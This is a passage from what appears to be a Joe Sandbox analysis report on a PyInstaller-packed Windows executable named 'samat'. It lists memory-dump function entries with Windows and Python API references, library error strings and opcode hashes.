                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                      • Instruction ID: 187e43ec799e49da231e51653b2d225c75f837ad1fbaf07bc2a2c70cfe28270d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4531F622B08A4142E721BB25BC113ABA699BF88B98F814137EF4D93759DF7CD516C311
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeallocErr_StringUnicode_strcmp
                                                                                                                                                                                                                                                                                      • String ID: SECURITY_DESCRIPTOR$The object is not a PySECURITY_DESCRIPTOR object$can't delete SECURITY_ATTRIBUTES attributes
                                                                                                                                                                                                                                                                                      • API String ID: 2499284733-1426751177
                                                                                                                                                                                                                                                                                      • Opcode ID: 67049ca7dcf50a80a15f7371c299508b5eda7be6bbffd79b9bab495011e33978
                                                                                                                                                                                                                                                                                      • Instruction ID: b60db15500475baa252b203e5730a1a281401ce6c09589768d16c60dd2ebbb17
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67049ca7dcf50a80a15f7371c299508b5eda7be6bbffd79b9bab495011e33978
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1921F962A18B4282FA548BAEE84017D63A0FF49FC4F884131EB5E57BB5DF3CE4918700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}, xrefs: 00007FF8B7E823C2
                                                                                                                                                                                                                                                                                      • lllO, xrefs: 00007FF8B7E82384
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
                                                                                                                                                                                                                                                                                      • String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$lllO
                                                                                                                                                                                                                                                                                      • API String ID: 959004690-1584370844
                                                                                                                                                                                                                                                                                      • Opcode ID: 40621dbdd1e1618c9ed3fe52cc1117dbd46a93d7919a77fe4b0fca76490f5cd3
                                                                                                                                                                                                                                                                                      • Instruction ID: a6573e93bd1893852a07cb13e5d07a102cd21ba71f46f2dfefff037937fd2721
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40621dbdd1e1618c9ed3fe52cc1117dbd46a93d7919a77fe4b0fca76490f5cd3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0314972A08B8682EB049F59E45026D73A4FF94BC4F444236EB8D02B66EF7CE694C704
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 00007FF8B7E864D1
                                                                                                                                                                                                                                                                                      • LARGE_INTEGER must be 'int', or '(int, int)', xrefs: 00007FF8B7E8650E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Long$Arg_Long_OccurredParseStringTupleWarn
                                                                                                                                                                                                                                                                                      • String ID: LARGE_INTEGER must be 'int', or '(int, int)'$Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead
                                                                                                                                                                                                                                                                                      • API String ID: 3944559157-3919795897
                                                                                                                                                                                                                                                                                      • Opcode ID: 28b8025bfafdb96d4bfd2a0ca2c1a4757072f5f8cd4f8e2994eeed24b2e5cec3
                                                                                                                                                                                                                                                                                      • Instruction ID: da1c1239428e64e1216e7cb438aee96106e3ff90c9a9a978177de5c568af83b4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28b8025bfafdb96d4bfd2a0ca2c1a4757072f5f8cd4f8e2994eeed24b2e5cec3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7021F922B09B4281EB508B9EF48016D6360FF88BD8F885135EBAE83769DE3CD4958700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313 ref: 00007FF8B7E85AC8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313 ref: 00007FF8B7E85B09
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32 ref: 00007FF8B7E85B1C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Long$Occurred$Long_String$ClearCloseDeallocFormatNumber_Unsigned
                                                                                                                                                                                                                                                                                      • String ID: HANDLE must be a PyHKEY$PyHKEY$RegCloseKey$The object is not a PyHANDLE object
                                                                                                                                                                                                                                                                                      • API String ID: 3516211060-2695813183
                                                                                                                                                                                                                                                                                      • Opcode ID: 0c5216022337286ed9870b41cdd036d90f6bfea009756c59fba8a0f1fd48fc4d
                                                                                                                                                                                                                                                                                      • Instruction ID: 46488c379ef98ef5980709b831fd59aef124e9ee4f0718a1cdd1a6dd30b4418b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c5216022337286ed9870b41cdd036d90f6bfea009756c59fba8a0f1fd48fc4d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4213022B18B4691EB508B69E4D007D63A1EF84FD4F945072DB0E876B1EE3CE989C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Buffer_Err_Release$BufferFormatObject_String
                                                                                                                                                                                                                                                                                      • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                                                      • API String ID: 1670810688-686265896
                                                                                                                                                                                                                                                                                      • Opcode ID: b8068afb17dceacaa5a51a8d99800dcb7b56c81bac3d0113414031d6818f4ca7
                                                                                                                                                                                                                                                                                      • Instruction ID: 2f06f9a4b78831482447759757e35754a839182eb1b5a2f749420ab60035285c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8068afb17dceacaa5a51a8d99800dcb7b56c81bac3d0113414031d6818f4ca7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6212822A0AB4681EB54CF5EE54423C63A1EF48FD4F584431EB4E476BADF3CE4859350
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 00007FF8B7E865FE
                                                                                                                                                                                                                                                                                      • ULARGE_INTEGER must be 'int', or '(int, int)', xrefs: 00007FF8B7E865DA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Long$Arg_Long_OccurredParseStringTupleUnsignedWarn
                                                                                                                                                                                                                                                                                      • String ID: Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead$ULARGE_INTEGER must be 'int', or '(int, int)'
                                                                                                                                                                                                                                                                                      • API String ID: 507489655-1767028231
                                                                                                                                                                                                                                                                                      • Opcode ID: 01d08b6a7bdc53fd350f74aed6df4b248a7441d7d16c80b61a1c5fffd659387c
                                                                                                                                                                                                                                                                                      • Instruction ID: b99682b6cfb22a551c6b00d68be1822e62ac7a2a386b836a7c4a7017b080666e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01d08b6a7bdc53fd350f74aed6df4b248a7441d7d16c80b61a1c5fffd659387c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04213E62B08B4292EB508B9EF58016D6360FF88FD9F845635EB6E476A9DF3CD494C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String$Bytes_FormatSize
                                                                                                                                                                                                                                                                                      • String ID: Attributes of PyDEVMODEW can't be deleted$Length of DriverData cannot be longer that DriverExtra (%d bytes)
                                                                                                                                                                                                                                                                                      • API String ID: 1818008259-1897733207
                                                                                                                                                                                                                                                                                      • Opcode ID: a5819ef29f43b57301ff4610e968360216c56eb932ab9b6083dcd6627cabfeef
                                                                                                                                                                                                                                                                                      • Instruction ID: 5ca53378551badb8d9a01f96c8195996565b5cf235a949979d61a66b03a99621
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5819ef29f43b57301ff4610e968360216c56eb932ab9b6083dcd6627cabfeef
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58117062E08B0281EB148B6EE8400BD2361EF89FE0F445231EA2E877B5EF3CD4958300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Authority$Arg_CountErr_FromLongLong_ParseStringTuple
                                                                                                                                                                                                                                                                                      • String ID: The index is out of range$i:GetSubAuthority
                                                                                                                                                                                                                                                                                      • API String ID: 2376698166-2602025648
                                                                                                                                                                                                                                                                                      • Opcode ID: 9792cac582ac62394290b1a74a7f90c0f1413b6a5918cc6ae41e1e619801df51
                                                                                                                                                                                                                                                                                      • Instruction ID: 9328fb99f3f1ea7ca17d80bd6c928246c290bf5f06d76739f721d4890ba96add
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9792cac582ac62394290b1a74a7f90c0f1413b6a5918cc6ae41e1e619801df51
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF03C62F0874382EB049BAAE84407D63A1AF89FC5F884431DB1E4B771DE3CE498C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurityfree$DaclGroupOwnerSacl
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1788430091-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f80fdbaf805613b61b14d3bdd1e52ccbc5edc22b729c516d134f0c2fd5eeb702
                                                                                                                                                                                                                                                                                      • Instruction ID: d4a6b859791a173722b2daaae16ba41a588622b47ed9cd4a68df2b2278eaa5c0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f80fdbaf805613b61b14d3bdd1e52ccbc5edc22b729c516d134f0c2fd5eeb702
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4212522A09B4291FF458F99E4502BE6770EF85FC0F980432EB4E52974DE3CD448CA00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD4D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD5B
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD85
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDF3
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDFF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                      • Instruction ID: de88a2c629d611537c078454b295b9c253d13256b400c749d567abecc1f2cb6a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F31C522F1A60692EF12AB029C02775A39CFF48BA4FD94537DE1D56384DFBCE444C261
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Unicode_
                                                                                                                                                                                                                                                                                      • String ID: Internal$InternalHigh$hEvent
                                                                                                                                                                                                                                                                                      • API String ID: 2646675794-1769053571
                                                                                                                                                                                                                                                                                      • Opcode ID: 3230954fda80a3a15b7262756ef6922f42f6b866fcf77cc308d0e9cd2de208ae
                                                                                                                                                                                                                                                                                      • Instruction ID: 0fbc83104a5c5051a7c8d9f4766f0305a16d53e0a5f76c8f6395f7e6fa89ad27
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3230954fda80a3a15b7262756ef6922f42f6b866fcf77cc308d0e9cd2de208ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88312B26B19B8281EB558B5AF55007D6760EF88FD8F481031EF5E4776AEE3CE891C704
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CallDeallocErr_FormatMethodObject_SubtypeType_
                                                                                                                                                                                                                                                                                      • String ID: astimezone$must be a pywintypes time object (got %s)
                                                                                                                                                                                                                                                                                      • API String ID: 244768906-1654730096
                                                                                                                                                                                                                                                                                      • Opcode ID: 4ebedb747ce80201b9841f6db2a3ad0b1a2b2efc78f376f388bf9c6af551531f
                                                                                                                                                                                                                                                                                      • Instruction ID: f107c7c26c019be5c82226abb85fda272eb3c91fbbc4059f7b26cc99ef046704
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ebedb747ce80201b9841f6db2a3ad0b1a2b2efc78f376f388bf9c6af551531f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2031D167A087C286EB588B6AD56017C3BA0EF49BC1B589037DBAE83361EE3CD154C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7E12C351A,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C2AA0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
